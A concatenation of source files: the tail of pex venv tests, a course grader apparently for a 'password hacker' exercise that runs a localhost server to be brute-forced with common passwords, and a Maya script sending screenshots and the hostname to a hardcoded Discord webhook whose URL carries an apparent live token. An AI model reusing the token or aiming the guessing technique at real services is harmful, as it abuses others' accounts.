# interpreter, a move of the venv makes the script un-runnable directly.
shutil.move(venv, relocated_venv)
with pytest.raises(OSError) as exec_info:
subprocess.check_call(args=[os.path.join(relocated_venv, "pex")])
assert errno.ENOENT == exec_info.value.errno
# But we should be able to run the script using the moved venv's interpreter.
subprocess.check_call(
args=[
os.path.join(relocated_relpath, "bin", "python"),
os.path.join(relocated_relpath, "pex"),
],
cwd=str(tmpdir),
)
def test_compile(tmpdir):
# type: (Any) -> None
def collect_files(
root_dir, # type: str
extension, # type: str
):
# type: (...) -> Set[str]
return {
os.path.relpath(os.path.join(root, f), root_dir)
for root, _, files in os.walk(root_dir, followlinks=False)
for f in files
if f.endswith(extension)
}
pex_file = os.path.join(str(tmpdir), "compile.pex")
src = os.path.join(str(tmpdir), "src")
with safe_open(os.path.join(src, "main.py"), "w") as fp:
fp.write(
dedent(
"""\
from colors import yellow
print(yellow("Slartibartfast"))
"""
)
)
result = run_pex_command(
args=["-D", src, "ansicolors==1.0.2", "-m", "main", "--include-tools", "-o", pex_file]
)
result.assert_success()
venv = os.path.join(str(tmpdir), "venv")
subprocess.check_call(args=[pex_file, "venv", venv], env=make_env(PEX_TOOLS=1))
# N.B.: The right way to discover the site-packages dir is via site.getsitepackages().
# Unfortunately we use an old version of virtualenv to create PyPy and CPython 2.7 venvs and it
# does not add a getsitepackages function to site.py; so we cheat.
if IS_PYPY:
site_packages = "site-packages"
else:
site_packages = os.path.join(
"lib", "python{}.{}".format(sys.version_info[0], sys.version_info[1]), "site-packages"
)
# Ensure we have at least the basic direct dependency python files we expect.
venv_py_files = collect_files(venv, ".py")
assert os.path.join(site_packages, "main.py") in venv_py_files
assert os.path.join(site_packages, "colors.py") in venv_py_files
assert "__main__.py" in venv_py_files
compile_venv = os.path.join(str(tmpdir), "compile.venv")
subprocess.check_call(
args=[pex_file, "venv", "--compile", compile_venv], env=make_env(PEX_TOOLS=1)
)
# Ensure all original py files have a compiled counterpart.
for py_file in venv_py_files:
if PY2:
assert os.path.exists(os.path.join(compile_venv, py_file + "c"))
else:
name, _ = os.path.splitext(os.path.basename(py_file))
assert os.path.exists(
os.path.join(
compile_venv,
os.path.dirname(py_file),
"__pycache__",
"{name}.{cache_tag}.pyc".format(
name=name, cache_tag=sys.implementation.cache_tag
),
)
)
compile_venv_pyc_files = collect_files(compile_venv, ".pyc")
subprocess.check_call(args=[os.path.join(compile_venv, "pex")])
assert compile_venv_pyc_files == collect_files(
compile_venv, ".pyc"
), "Expected no new compiled python files."
def test_strip_pex_env(tmpdir):
# type: (Any) -> None
def create_pex_venv(strip_pex_env):
# type: (bool) -> str
pex = os.path.join(str(tmpdir), "strip_{}.pex".format(strip_pex_env))
run_pex_command(
args=[
"--strip-pex-env" if strip_pex_env else "--no-strip-pex-env",
"--include-tools",
"-o",
pex,
]
).assert_success()
venv = os.path.join(str(tmpdir), "strip_{}.venv".format(strip_pex_env))
subprocess.check_call(args=[pex, "venv", venv], env=make_env(PEX_TOOLS=1))
return venv
check_pex_env_vars_code = dedent(
"""\
from __future__ import print_function
import os
import sys
pex_env_vars = 0
for name, value in os.environ.items():
if name.startswith("PEX_"):
pex_env_vars += 1
print(
"Un-stripped: {name}={value}".format(name=name, value=value), file=sys.stderr
)
sys.exit(pex_env_vars)
"""
)
two_pex_env_vars = {
name: value
for name, value in make_env(PEX_ROOT="42", PEX_TOOLS=1).items()
if name in ("PEX_ROOT", "PEX_TOOLS") or not name.startswith("PEX_")
}
assert 2 == len([name for name in two_pex_env_vars if name.startswith("PEX_")])
strip_venv = create_pex_venv(strip_pex_env=True)
subprocess.check_call(
args=[os.path.join(strip_venv, "pex"), "-c", check_pex_env_vars_code], env=two_pex_env_vars
)
no_strip_venv = create_pex_venv(strip_pex_env=False)
process = subprocess.Popen(
args=[os.path.join(no_strip_venv, "pex"), "-c", check_pex_env_vars_code],
env=two_pex_env_vars,
)
assert 2 == process.wait()
def test_warn_unused_pex_env_vars():
# type: () -> None
# N.B.: We don't use the pytest tmpdir fixture here since it creates fairly length paths under
# /tmp and under macOS, where TMPDIR is already fairly deeply nested, we trigger Pex warinings
# about script shebang length. Those warnings pollute stderr.
tmpdir = safe_mkdtemp()
venv_pex = os.path.join(tmpdir, "venv.pex")
run_pex_command(["--venv", "-o", venv_pex]).assert_success()
def assert_execute_venv_pex(expected_stderr, **env_vars):
env = os.environ.copy()
env.update(env_vars)
process = subprocess.Popen(
[venv_pex, "-c", ""], stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env
)
stdout, stderr = process.communicate()
assert 0 == process.returncode
assert not stdout
assert expected_stderr.strip() == stderr.decode("utf-8").strip()
assert_execute_venv_pex(expected_stderr="")
assert_execute_venv_pex(expected_stderr="", PEX_ROOT=os.path.join(tmpdir, "pex_root"))
assert_execute_venv_pex(expected_stderr="", PEX_VENV="1")
assert_execute_venv_pex(expected_stderr="", PEX_EXTRA_SYS_PATH="more")
assert_execute_venv_pex(expected_stderr="", PEX_VERBOSE="0")
assert_execute_venv_pex(
expected_stderr=dedent(
"""\
Ignoring the following environment variables in Pex venv mode:
PEX_INHERIT_PATH=fallback
"""
),
PEX_INHERIT_PATH="fallback",
)
assert_execute_venv_pex(
expected_stderr=dedent(
"""\
Ignoring the following environment variables in Pex venv mode:
PEX_COVERAGE=1
PEX_INHERIT_PATH=fallback
"""
),
PEX_COVERAGE="1",
PEX_INHERIT_PATH="fallback",
PEX_VERBOSE="0",
)
def test_custom_prompt(tmpdir):
# type: (Any) -> None
pex_root = os.path.join(str(tmpdir), "pex_root")
venv_pex = os.path.join(str(tmpdir), "venv.pex")
run_pex_command(
args=[
"--pex-root",
pex_root,
"--runtime-pex-root",
pex_root,
"-o",
venv_pex,
"--include-tools",
]
).assert_success()
venv_dir = os.path.join(str(tmpdir), "venv_dir")
subprocess.check_call(
args=[venv_pex, "venv", "--prompt", "jane", venv_dir], env=make_env(PEX_TOOLS=True)
)
if PY_VER == (2, 7) or IS_PYPY:
# Neither CPython 2.7 not PyPy interpreters have (functioning) venv modules; so we create
# their venvs with an old copy of virtualenv that does not surround the prompt with parens.
expected_prompt = "jane"
elif PY_VER == (3, 5):
# We can't set the prompt for CPython 3.5 so we expect the name of the venv dir.
expected_prompt = "(venv_dir)"
else:
expected_prompt = "(jane)"
output = subprocess.check_output(
args=[
"/usr/bin/env",
"bash",
"-c",
"source {} && echo $PS1".format(os.path.join(venv_dir, "bin", "activate")),
],
env=make_env(TERM="dumb", COLS=80),
)
assert expected_prompt == output.decode("utf-8").strip()
|
tests.py
|
from hstest.stage_test import StageTest
from hstest.test_case import TestCase
from hstest.check_result import CheckResult
from threading import Thread
from time import sleep
import socket
import random
CheckResult.correct = lambda: CheckResult(True, '')
CheckResult.wrong = lambda feedback: CheckResult(False, feedback)
abc = 'abcdefghijklmnopqrstuvwxyz1234567890'
passwords = [
'chance', 'frankie', 'killer', 'forest', 'penguin'
'jackson', 'rangers', 'monica', 'qweasdzxc', 'explorer'
'gabriel', 'chelsea', 'simpsons', 'duncan', 'valentin',
'classic', 'titanic', 'logitech', 'fantasy', 'scotland',
'pamela', 'christin', 'birdie', 'benjamin', 'jonathan',
'knight', 'morgan', 'melissa', 'darkness', 'cassie'
]
def generate_password():
'''function - generator of all passwords from dictionary'''
for password in passwords:
yield password.rstrip().lower()
def random_password():
'''function - generating random password from dictionary'''
pas = random.choice(list(generate_password()))
uppers = []
for i in range(len(pas)):
uppers.append(random.randint(0, 1))
return ''.join(
pas[j].upper() if uppers[j] == 1
else pas[j]
for j in range(len(pas)))
class Hacking(StageTest):
def __init__(self, module):
super().__init__(module)
self.ready = False
self.sock = None
self.serv = None
self.connected = False
self.message = []
self.password = None
def start_server(self):
self.serv = Thread(target=lambda: self.server())
self.serv.start()
self.ready = False
while not self.ready:
try:
sleep(0.1) # socket needs to be set up before test
except KeyboardInterrupt:
pass
def stop_server(self):
self.sock.close()
self.serv.join()
def server(self):
'''function - creating a server and answering clients'''
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind(('localhost', 9090))
self.ready = True
try:
self.sock.listen(1)
conn, addr = self.sock.accept()
self.connected = True
conn.settimeout(15)
while True:
data = conn.recv(1024)
self.message.append(data.decode('utf8'))
if len(self.message) > 1_000_000:
conn.send('Too many attempts to connect!'.encode('utf8'))
break
if not data:
break
if data.decode('utf8') == self.password:
conn.send('Connection success!'.encode('utf8'))
break
else:
conn.send('Wrong password!'.encode('utf8'))
conn.close()
except:
pass
def generate(self):
self.message = []
self.password = random_password()
self.start_server()
return [TestCase(args=['localhost', '9090'],
attach=[self.password])]
def check(self, reply, attach):
self.stop_server()
if not self.connected:
return CheckResult.wrong("You didn't connect to the server")
real_password = attach[0]
printed_password = reply.split('\n')[0]
if reply.split('\n')[0] != real_password:
return CheckResult.wrong(
'The password you printed is not correct\n'
'You printed: \"' + printed_password + '\"\n'
'Correct password: \"' + real_password + '\"'
)
return CheckResult.correct()
if __name__ == '__main__':
test = Hacking('hacking.hack')
test.run_tests()
test.stop_server()
|
vfs_m1_screenshot_sender.py
|
"""
This script has been modified for Modeling 1.
GT Screenshot Sender - Send images to your instructor.
@Guilherme Trevisan - TrevisanGMW@gmail.com - 2021-01-05 - github.com/TrevisanGMW
Tested on Maya 2018, 2019, 2020 - Windows 10
1.1 - 2021-01-12
Changed method to viewport only for better compatibility
1.2 - 2021-06-01
Made script compatible with Python 3 (Maya 2022+)
"""
try:
from shiboken2 import wrapInstance
except ImportError:
from shiboken import wrapInstance
try:
from PySide2 import QtWidgets, QtGui, QtCore
from PySide2.QtGui import QIcon
from PySide2.QtWidgets import QWidget
except ImportError:
from PySide import QtWidgets, QtGui, QtCore
from PySide.QtGui import QIcon, QWidget
try:
from httplib2 import Http
except ImportError:
import http.client
import maya.OpenMayaUI as omui
import maya.utils as utils
import maya.OpenMaya as om
import maya.cmds as cmds
import maya.mel as mel
import threading
import urllib
import base64
import socket
import datetime
import mimetypes
import random
import string
import copy
import time
import sys
import os
from json import dumps
from json import loads
# Forced Webhook
hard_coded_webhook = 'https://discord.com/api/webhooks/XXXX'
hard_coded_webhook = 'https://discord.com/api/webhooks/843586759425523714/RB5ILSBzvgnLkFvEOAEx_NK2EQYbgVerZhA0VWysZ_Ydml6vZ9TD1PBhi3YT7Tfp1Dlq'
hard_coded_webhook_name = 'Instructor'
# Script Name
script_name = "Screenshot Sender"
# Versions:
script_version = "1.2"
maya_version = cmds.about(version=True)
# Python Version
python_version = sys.version_info.major
# Used to define multipart/form-data boundary
_BOUNDARY_CHARS = string.digits + string.ascii_letters
# Settings
gt_mtod_settings_submit_ss = { 'discord_webhook':hard_coded_webhook,
'discord_webhook_name' : hard_coded_webhook_name,
'is_first_time_running' : False,
'custom_username' : '',
'image_format' : 'jpg',
'video_format' : 'mov',
'video_scale_pct' : 40,
'video_compression' : 'Animation',
'video_output_type' : 'qt',
'is_new_instance' : True,
'is_webhook_valid' : False,
'feedback_visibility' : True,
'timestamp_visibility' : True }
# Default Settings (Deep Copy)
gt_mtod_settings_submit_ss_default = copy.deepcopy(gt_mtod_settings_submit_ss)
def build_gui_submit_screenshot():
''' Builds the Main GUI for the script '''
window_name = "build_gui_submit_screenshot"
if cmds.window(window_name, exists =True):
cmds.deleteUI(window_name)
# Main GUI Start Here =================================================================================
# Build UI
build_gui_submit_screenshot = cmds.window(window_name, title=' ' + script_name + " - v" + script_version,\
titleBar=True, mnb=False, mxb=False, sizeable =True)
cmds.window(window_name, e=True, s=True, wh=[1,1])
column_main = cmds.columnLayout()
form = cmds.formLayout(p=column_main)
content_main = cmds.columnLayout(adj = True)
# Title Text
cmds.separator(h=10, style='none') # Empty Space
cmds.rowColumnLayout(nc=1, cw=[(1, 270)], cs=[(1, 10)], p=content_main) # Window Size Adjustment
cmds.rowColumnLayout(nc=4, cw=[(1, 10), (2, 250)], cs=[(1, 10), (2, 0), (3, 0)], p=content_main) # Title Column
cmds.text(" ", bgc=[.4,.4,.4], h=25) # Tiny Empty Green Space
cmds.text(script_name, bgc=[.4,.4,.4], fn="boldLabelFont")
cmds.separator(h=5, style='none') # Empty Space
# Body ====================
body_column = cmds.rowColumnLayout(nc=1, cw=[(1, 260)], cs=[(1,10)], p=content_main)
# Generate Images
# Icon
icons_folder_dir = cmds.internalVar(userBitmapsDir=True)
icon_image = ':/camera.open.svg'
# Send Desktop Icon
send_desktop_btn_ico = icons_folder_dir + 'gt_mtod_send_desktop.png'
if os.path.isdir(icons_folder_dir) and os.path.exists(send_desktop_btn_ico) == False:
image_enconded = 'iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAACXBIWXMAAAsTAAALEwEAmpwYAAAF8WlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNS42LWMxNDggNzkuMTY0MDM2LCAyMDE5LzA4LzEzLTAxOjA2OjU3ICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6cGhvdG9zaG9wPSJodHRwOi8vbnMuYWRvYmUuY29tL3Bob3Rvc2hvcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RFdnQ9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZUV2ZW50IyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgMjEuMCAoV2luZG93cykiIHhtcDpDcmVhdGVEYXRlPSIyMDIwLTExLTAzVDExOjU1OjM4LTA4OjAwIiB4bXA6TW9kaWZ5RGF0ZT0iMjAyMC0xMS0wM1QxMjoyNzoxMi0wODowMCIgeG1wOk1ldGFkYXRhRGF0ZT0iMjAyMC0xMS0wM1QxMjoyNzoxMi0wODowMCIgZGM6Zm9ybWF0PSJpbWFnZS9wbmciIHBob3Rvc2hvcDpDb2xvck1vZGU9IjMiIHBob3Rvc2hvcDpJQ0NQcm9maWxlPSJzUkdCIElFQzYxOTY2LTIuMSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDpiZTc1ODU2NC04YThkLTQ2NDUtYmU2Yy1lMmY5ZmQwMWU0YjgiIHhtcE1NOkRvY3VtZW50SUQ9ImFkb2JlOmRvY2lkOnBob3Rvc2hvcDozYjViOWNhMy1lODgwLTgxNGQtYmFjOS1mNTNmNDExMWQ0MDciIHhtcE1NOk9yaWdpbmFsRG9jdW1lbnRJRD0ieG1wLmRpZDo5MGM2ZTQ5My0xZDNkLTNiNGQtODI0ZS1kN2JhZDRlNzQ1MzQiPiA8eG1wTU06SGlzdG9yeT4gPHJkZjpTZXE+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJjcmVhdGVkIiBzdEV2dDppbnN0YW5jZUlEPSJ4bXAuaWlkOjkwYzZlNDkzLTFkM2QtM2I0ZC04MjRlLWQ3YmFkNGU3NDUzNCIgc3RFdnQ6d2hlbj0iMjAyMC0xMS0wM1QxMTo1NTozOC0wODowMCIgc3RFdnQ6c29mdHdhcmVBZ2VudD0iQWRvYmUgUGhvdG9zaG9wIDIxLjAgKFdpbmRvd3MpIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJzYXZlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDpiZTc1ODU2NC04YThkLTQ2NDUtYmU2Yy1lMmY5ZmQwMWU0YjgiIHN0RXZ0OndoZW49IjIwMjAtMTEtMDNUMTI6Mjc6MTItMDg6MDAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCAyMS4wIChXaW5kb3dzKSIgc3RFdnQ6Y2hhbmdlZD0iLyIvPiA8L3JkZjpTZXE+IDwveG1wTU06SGlzdG9yeT4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2tldCBlbmQ9InIiPz7PHrkDAAAFDklEQVRYhe2XT2gUVxzHP+/N7M5kdetG6+ISY1sRak38Q7L9RwyUhlioh4aI1nry3EKgiKcWUS8tVQjkkAZbpLSRVg/anEzFYGJzsU5AAqUhpUuyQdckWje7+bPZnZnXQ3bDanbWikUv/Z5m5v3e+33e7733e78RSimep/ShoaH9QBOQAZ4FjQ5kgV/r6+t/1oEjruvWAdozcA6A4zhOIpE4EI1G0YG6qakpZ3BwUOq6LmzbRgjh2VkIUbJdKcXjllNKiWEYNDc3+zZs2LAR+FQH1JUrV/xdXV0xKeVV13V9QA7wplhqkyW+u5RZRiklVVVVq2tqat6LRCIvAm/oAJqmKV3Xe/r7+6uEEE1CCD/gPMa5KnqnjD2AVErds237m4GBgW8jkcg1YC0sbQiy2SyVlZWmlPJgJpPJ3rx5UxmGoQkhSs4mH+oVESplr5RCCEF9fX1ofHz85IkTJ+jv7884jgOg9EJoNE3LAvT09PhPnTqVBK4Bq8rMqhRcyWULBALi3Llzb7muG3Qc50MppZ0HWIpAXhLAMAyAHyzLaivjfFnRaPSxNtevXw8qpX6LxWKbWDpt9kNOAdRSXFV+h1f8G+dPIqWUVErJYucPATyicifgP5UXwDPT/wArAMql4adUyYFXACwsLHgaP4XmgYyUKwOuw3K2EoCorKxk27ZtGvBqmQGXR7Isq/DolrEPSCkDuq4X+i4fxeVMaNu2C7Bnzx62b9/eksvl3lFKlYyEEIISbV6XkBJCSJ/PVz07O5sB/CsAbNvmzp07i1NTUx/39vZ2GoaxxjRN23XdkjWCKLFRXNcteRcUNDs7+2BwcLBS1/VU8bWtAyIUColIJKKFw+GvOzo65oBawKR8WL2uY09pmpY+dOhQDDhSmIOwLEtls1nu379/LxwOT2iatoD3JtTyTh7k3yuANBAAVrO0DOWqEiNvuxUgGo1mdOBYX1/fSb/fvzYWi2n5imfFTKSUpNNpx3EcGhsb1/n9fjE5OTlXVVUVjMfjMyMjI2nTNCt8Pp/wgsiHXqbT6eTo6GgIMHXgi66uropMJrNFKeXLd14RgVwup9LptLtv377Vzc3NzRcuXMidP3/e6OjoWDRNc017e/v49PT0YCgUWi+l9HtBSClxXZdUKvU3MKoD9u3bt48BL1BmDY8ePbqupaWlzTCMg8lkcrS7u3vL3bt3OxKJxPDOnTvPdnZ2vhYIBL7fu3fvJ0CQ8kWuyPuaFUXnuFgm0AC8DmwCaoBXgOrh4eGR48ePr4/H46PAQSDe1tZ2ZPfu3V9t3rxZptPpqWAwaAG/AxPAQDQaHfYk8QDYqpT6BdgohJDz8/OZoaGh1KVLl8StW7fWp1Kpn4DPLcv6q1CQNDU1tYbD4Y6Ghoaquro65ff7RS6XyyUSiT9bW1s/AkpC6KU+AqYQYtPAwMD86dOnjUwmY87Nzc1ls9leoBu4YVnWg+IOfX19F4EbV69e/cDn8x0A3jxz5oxp2/ZW4Evg/ScBACAYDAZ27NgxcPjw4YvBYFCEQqFF0zSrgZdYWkdlWVZxVayA+ZmZmbPT09PfhcPh9rGxsVVAtZcPL4DU4uLi2K5du16ura1t1HX97bxD4bplc00BXAWDQaSUvrGxsSxlNrcXwGQ8Hu+cmJj4LJlMviCEkHkAz7+fR7KzkFKilHIuX77sB/7wAhCFur2EVgH7gXdZuk6L5ZXtHh2o8APzI9DvCfA89Q9+dgWL9W/IeAAAAABJRU5ErkJggg=='
image_64_decode = base64.decodestring(image_enconded)
image_result = open(send_desktop_btn_ico, 'wb')
image_result.write(image_64_decode)
image_result.close()
if os.path.exists(send_desktop_btn_ico) == False:
send_desktop_btn_ico = 'fluidGetExamples.png'
cmds.separator(h=5)
cmds.separator(h=7, style='none') # Empty Space
cmds.rowColumnLayout(nc=2, cw=[(1, 100),(2, 143),(4, 37)], cs=[(1, 18),(2, 0),(3, 0),(4, 0)], p=content_main)
cmds.text(l='Webhoook Name:', align="center", fn="boldLabelFont")
webhook_name_text = cmds.text(l='...', align="center", fn="tinyBoldLabelFont")
cmds.separator(h=7, style='none') # Empty Space
cmds.rowColumnLayout(nc=3, cw=[(1, 100),(2, 50),(3, 100),(4, 50)], cs=[(1, 10),(2, 0),(3, 0),(4, 0)], p=content_main)
cmds.text(l='Web Response:', align="center", fn="boldLabelFont")
status_code_text = cmds.text(l='', align="center")
status_message_text = cmds.text(l='', align="center")
if gt_mtod_settings_submit_ss['is_first_time_running'] == True:
cmds.text(webhook_name_text, e=True, l=hard_coded_webhook_name)#, bgc= [1,1,0]) # MODIFIED
else:
if 'Error' in gt_mtod_settings_submit_ss.get('discord_webhook_name') or 'Missing Webhook' in gt_mtod_settings_submit_ss.get('discord_webhook_name'):
cmds.text(webhook_name_text, e=True, l=gt_mtod_settings_submit_ss.get('discord_webhook_name'), bgc=[.5,0,0])
else:
cmds.text(webhook_name_text, e=True, l=gt_mtod_settings_submit_ss.get('discord_webhook_name'), nbg=True)
cmds.rowColumnLayout(nc=1, cw=[(1, 260)], cs=[(1, 10)], p=content_main)
cmds.separator(h=7, style='none') # Empty Space
cmds.separator(h=5)
stored_username_exists = cmds.optionVar(exists=("gt_submit_message_username"))
if stored_username_exists:
try:
stored_username = str(cmds.optionVar(q=("gt_submit_message_username")))
except:
stored_username = ''
else:
stored_username = ''
cmds.separator(h=7, style='none') # Empty Space
attached_message_txtfield = cmds.textField(pht='Type your name or nickname here...', text=stored_username, cc=lambda x:store_name(cmds.textField(attached_message_txtfield, q=True, text=True)))
cmds.separator(h=10, style='none') # Empty Space
def store_name(name):
cmds.optionVar( sv=('gt_submit_message_username', name) )
screenshot_btn_color = [.4,.4,.4]
cmds.rowColumnLayout(nc=1, cw=[(1, 260),(2, 1),(3, 5)], cs=[(1, 10),(2, 0),(3, 0)], p=content_main)
send_desktop_btn = cmds.iconTextButton( style='iconAndTextVertical', image1=send_desktop_btn_ico, label='Send Screenshot to Instructor',\
statusBarMessage='This button will take a screenshot to your instructor.',\
olc=[1,0,0] , enableBackground=True, bgc=screenshot_btn_color, h=80,\
command=lambda: send_maya_window())
cmds.separator(h=2, style='none') # Empty Space
cmds.separator(h=10, style='none') # Empty Space
# Functions for the buttons -----------
def get_date_time_message():
'''
Returns formated string of date and time to be used as a message
Returns:
date_and_time (str): A formated string containing current date and time.
'''
now = datetime.datetime.now()
return now.strftime("Date: %m/%d/%Y - Time: %H:%M:%S")
def get_username(ignore_machine=False):
'''
Returns string to be used as username, it extracts it from the computer's username.
A custom username may be used, in which case the function returns the custom username followed by the computer's username.
Returns:
username (str): A string composed of custom username (if it exists) and the computer's username
'''
stored_username_exists = cmds.optionVar(exists=("gt_submit_message_username"))
if stored_username_exists:
try:
stored_username = str(cmds.optionVar(q=("gt_submit_message_username")))
except:
stored_username = ''
user_name = stored_username + ' (' + socket.gethostname() + ')'
if ignore_machine:
return user_name
else:
return stored_username
def update_text_status(error=False):
'''
Updates UI texts to say "Uploading" or "Error"
Parameters:
error (bool): Determines if it will update it to be red and say error or yellow to say Uploading. Default = Uploading (False)
'''
if not error:
cmds.text(status_message_text, e=True, l='Uploading', bgc=(1, 1, 0))
cmds.text(status_code_text, e=True, l='...', bgc=(1, 1,0))
else:
cmds.text(status_message_text, e=True, l='...', bgc=(.5, 0, 0))
cmds.text(status_code_text, e=True, l='Error', bgc=(.5, 0, 0))
def clear_attached_message(response):
'''
Clears the attached message when a success code is received
Parameters:
response (dict): A dictionary response received from a HTTP object after post/get operation.
'''
if len(response) >= 1:
status_value = response[0].status
success_codes = [200, 201, 202, 203, 204, 205, 206]
if status_value in success_codes:
pass#cmds.textField(attached_message_txtfield, e=True, text='')
def parse_sending_response(response):
'''
Processes response received when sending an image/video and updates UI text accordingly
Parameters:
response (dict): A dictionary response received from a HTTP object after post/get operation.
'''
if len(response) >= 1:
status_value = response[0].status
reason_value = response[0].reason
success_codes = [200, 201, 202, 203, 204, 205, 206]
if status_value in success_codes:
cmds.text(status_message_text, e=True, l=reason_value, bgc=(0, 0.5, 0))
cmds.text(status_code_text, e=True, l=status_value, bgc=(0, 0.5,0))
else: # Error
cmds.text(status_message_text, e=True, l=reason_value, bgc=(0.5, 0, 0))
cmds.text(status_code_text, e=True, l=status_value, bgc=(0.5, 0,0))
else :
cmds.text(status_message_text, e=True, l='Can\'t read response', bgc=(0.5, 0,0))
cmds.text(status_code_text, e=True, l='Can\'t read response', bgc=(0.5, 0,0))
def attached_text_message(operation_name, response):
'''
Attaches message to the content sent according the response received and the content of the message.
Parameters:
operation_name (string): Name of the operation, used to write an output message.
response (dict): A dictionary response received from a HTTP object after post/get operation. (This should be the response of the previous operation)
'''
if len(response) >= 1:
status_value = response[0].status
success_codes = [200, 201, 202, 203, 204, 205, 206]
if status_value in success_codes:
try:
upload_message = cmds.textField(attached_message_txtfield, q=True, text=True)
if upload_message.strip() != '':
def threaded_upload():
try:
discord_post_message(get_username(), upload_message, gt_mtod_settings_submit_ss.get('discord_webhook'))
utils.executeDeferred(response_inview_feedback, operation_name, response, display_inview=gt_mtod_settings_submit_ss.get('feedback_visibility'))
utils.executeDeferred(clear_attached_message, response)
except Exception as e:
print(e)
thread = threading.Thread(None, target = threaded_upload)
thread.start()
else:
response_inview_feedback(operation_name, response, display_inview=gt_mtod_settings_submit_ss.get('feedback_visibility'))
except:
pass
def disable_buttons():
''' Disable buttons so user don't accidently send multiple requests at once '''
cmds.iconTextButton(send_desktop_btn, e=True, enable=False)
def enable_buttons():
''' Enable buttons after finishing previously requested function '''
cmds.iconTextButton(send_desktop_btn, e=True, enable=True)
# Button Functions ----------
webhook_error_message = 'Sorry, something went wrong. Please review your webhook and settings.'
def send_dekstop_screenshot():
''' Attempts to send a desktop screenshot using current settings '''
if gt_mtod_settings_submit_ss.get('is_new_instance'):
update_discord_webhook_validity(gt_mtod_settings_submit_ss.get('discord_webhook'))
if gt_mtod_settings_submit_ss.get('is_webhook_valid'):
try:
update_text_status()
temp_path = generate_temp_file(gt_mtod_settings_submit_ss.get('image_format'))
temp_desktop_ss_file = capture_desktop_screenshot(temp_path)
if gt_mtod_settings_submit_ss.get('timestamp_visibility'):
upload_message = get_date_time_message()
else:
upload_message = ''
def threaded_upload():
try:
utils.executeDeferred(disable_buttons)
response = discord_post_attachment(get_username(), upload_message, temp_desktop_ss_file, gt_mtod_settings_submit_ss.get('discord_webhook'))
utils.executeDeferred(enable_buttons)
utils.executeDeferred(parse_sending_response, response)
utils.executeDeferred('', 'desktop screenshot', response)
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
thread = threading.Thread(None, target = threaded_upload)
thread.start()
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
else:
cmds.warning(webhook_error_message)
def send_maya_window():
''' Attempts to send an image of the maya window using current settings '''
if gt_mtod_settings_submit_ss.get('is_new_instance'):
update_discord_webhook_validity(gt_mtod_settings_submit_ss.get('discord_webhook'))
if gt_mtod_settings_submit_ss.get('is_webhook_valid'):
try:
update_text_status()
temp_path = generate_temp_file(gt_mtod_settings_submit_ss.get('image_format'))
temp_img_file = capture_app_window(temp_path)
if gt_mtod_settings_submit_ss.get('timestamp_visibility'):
upload_message = get_date_time_message()
else:
upload_message = ''
def threaded_upload():
try:
utils.executeDeferred(disable_buttons)
response = discord_post_attachment(get_username(), upload_message, temp_img_file, gt_mtod_settings_submit_ss.get('discord_webhook'))
utils.executeDeferred(enable_buttons)
utils.executeDeferred(parse_sending_response, response)
utils.executeDeferred(attached_text_message, 'Maya window screenshot', response)
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
thread = threading.Thread(None, target = threaded_upload)
thread.start()
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
else:
cmds.warning(webhook_error_message)
def send_viewport_only():
''' Attempts to send an image of the active viewport using current settings '''
if gt_mtod_settings_submit_ss.get('is_new_instance'):
update_discord_webhook_validity(gt_mtod_settings_submit_ss.get('discord_webhook'))
if gt_mtod_settings_submit_ss.get('is_webhook_valid'):
try:
update_text_status()
temp_path = generate_temp_file(gt_mtod_settings_submit_ss.get('image_format'))
if maya_version in ['2017','2018','2019']:
temp_img_file = capture_viewport_playblast(temp_path)
else:
temp_img_file = capture_viewport(temp_path)
if gt_mtod_settings_submit_ss.get('timestamp_visibility'):
upload_message = get_date_time_message()
else:
upload_message = ''
def threaded_upload():
try:
utils.executeDeferred(disable_buttons)
response = discord_post_attachment(get_username(), get_username(True) + ' - ' + upload_message, temp_img_file, gt_mtod_settings_submit_ss.get('discord_webhook'))
utils.executeDeferred(enable_buttons)
utils.executeDeferred(parse_sending_response, response)
utils.executeDeferred('', 'viewport screenshot', response)
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
thread = threading.Thread(None, target = threaded_upload)
thread.start()
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
else:
cmds.warning(webhook_error_message)
def send_animated_playblast():
''' Attempts to record a playblast and upload it using the current settings '''
if gt_mtod_settings_submit_ss.get('is_new_instance'):
update_discord_webhook_validity(gt_mtod_settings_submit_ss.get('discord_webhook'))
if gt_mtod_settings_submit_ss.get('is_webhook_valid'):
try:
update_text_status()
